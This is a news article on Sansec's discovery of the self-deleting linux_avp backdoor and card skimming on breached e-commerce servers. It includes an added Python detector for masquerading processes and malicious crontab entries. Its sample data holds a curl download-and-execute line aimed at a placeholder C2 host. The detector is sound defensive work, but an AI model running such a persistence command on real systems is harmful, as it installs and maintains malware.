Cybersecurity researchers have uncovered a new attack campaign that deploys a Linux backdoor on compromised e-commerce servers and exfiltrates customers' personal information, including credit card details.
According to Sansec researchers, the attackers began with automated e-commerce attack probes, testing for dozens of vulnerabilities in online store platforms. As soon as one is found, they use a PHP-coded web skimmer to download and inject fake payment forms into the checkout pages that the compromised store displays to its customers.
“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms. After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data,” the Sansec threat research team stated.
The Golang-based malware, which was unearthed on the same site by Dutch cyber-security firm Sansec, was downloaded and executed on infiltrated servers as a linux_avp executable. Once running, it immediately deletes itself from disk and disguises itself as a "ps -ef" process, mimicking the command normally used to list the currently running processes.
While examining the linux_avp backdoor, the researchers discovered that it waits for commands from a Beijing server on Alibaba’s network.
Additionally, the malware gains persistence by inserting a new crontab entry that re-downloads the payload from its command-and-control server and reinstalls the backdoor if it is detected and removed or if the server restarts.
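The two behaviours described above, a process that has unlinked its own binary while posing as `ps -ef`, and a crontab entry that re-downloads and re-executes a payload, are both visible to a host-level check. The following is an added detection example written for this article, not code from Sansec or from the malware; the process list, the `(deleted)` suffix format and the crontab lines are constructed sample data, and the C2 hostname is a placeholder.

```python
import os
import re
from dataclasses import dataclass

# A process as reconstructed from /proc/<pid>/cmdline and the /proc/<pid>/exe
# symlink. The kernel appends " (deleted)" to the link target when the binary
# was unlinked after it was started (assumed format for this example).
@dataclass
class Proc:
    pid: int
    cmdline: str
    exe: str

COMMON_TOOLS = {"ps", "sh", "bash", "cron", "sshd", "kworker"}

def masquerading_deleted(procs):
    """Return PIDs whose argv claims to be a stock tool (e.g. 'ps -ef') but
    whose executable no longer exists on disk. A genuine /usr/bin/ps is never
    '(deleted)'; a self-deleting backdoor renamed to look like ps is."""
    hits = []
    for p in procs:
        tool = os.path.basename(p.cmdline.split()[0]) if p.cmdline.strip() else ""
        if p.exe.endswith(" (deleted)") and tool in COMMON_TOOLS:
            hits.append(p.pid)
    return hits

# Crontab command that fetches something over the network and then runs it:
# the re-download-and-reinstall persistence pattern described in the article.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|&&\s*(chmod|sh\b|/))")

def suspicious_cron_lines(crontab_text):
    """Return non-comment crontab lines that download and execute a payload."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and DOWNLOAD_EXEC.search(line)]

def read_live_procs():
    """Build Proc records from a real /proc tree (Linux only); unreadable
    entries are skipped so the scan can run unprivileged."""
    procs = []
    for pid in (d for d in os.listdir("/proc") if d.isdigit()):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace")
            procs.append(Proc(int(pid), cmdline, os.readlink(f"/proc/{pid}/exe")))
        except OSError:
            continue
    return procs

# Constructed sample data, not indicators from the Sansec report.
SAMPLE_PROCS = [
    Proc(1234, "ps -ef", "/usr/bin/ps"),
    Proc(4321, "ps -ef", "/tmp/linux_avp (deleted)"),
    Proc(999, "nginx: worker process", "/usr/sbin/nginx"),
]
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s http://C2_PLACEHOLDER/linux_avp -o /tmp/linux_avp && chmod +x /tmp/linux_avp && /tmp/linux_avp
"""
```

On a live host, run `masquerading_deleted(read_live_procs())` and feed the output of `crontab -l` for each user into `suspicious_cron_lines`; both heuristics produce false positives after package upgrades (a running daemon whose binary was replaced) and for legitimate installer cron jobs, so treat hits as leads for investigation rather than verdicts.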
Unfortunately, this backdoor remains undetected by the anti-malware engines on VirusTotal, even though a sample was first uploaded more than a month ago, on October 8th. The uploader may well be the linux_avp author, since the sample was submitted one day after the researchers discovered it while investigating the e-commerce site breach.
“Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment ‘test’. This was just one day after the successful breach of our customer’s store. The person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation,” said the researchers.